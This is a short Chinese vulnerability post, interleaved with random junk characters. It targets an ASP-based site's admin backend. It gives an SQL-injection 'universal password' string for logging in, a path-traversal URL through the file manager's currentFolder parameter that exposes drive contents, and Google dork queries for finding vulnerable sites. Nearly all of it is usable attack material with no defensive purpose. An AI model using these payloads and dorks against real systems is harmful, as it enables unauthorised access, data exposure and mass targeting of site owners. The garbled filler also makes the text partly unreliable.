后台万能密码 'or'='or'% q4 @- B+ M3 J' w1 {' P2 q
. s# ^/ ^# V7 f9 l% g5 ^. H后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
8 l0 P* ^& G G6 \; x; Gadmin/uploadfile.asp?currentFolder=/upfiles/../
* s" a0 C+ l1 {$ P
* F$ H" |8 c/ S. G: K6 Y0 R* M漏洞证明:( V% f8 j# Z6 x! H4 X( a
3 A% f" h+ G& N* x" n
谷歌:inurl:type.asp?id=1 新闻中心
2 m& l% y& c4 \3 F0 r& O. ?' ~或者 :inurl:download_ok.asp?
7 ^4 b+ o! ]3 d5 I: Y. l( |7 g% V- j P# n W% S7 E/ P
|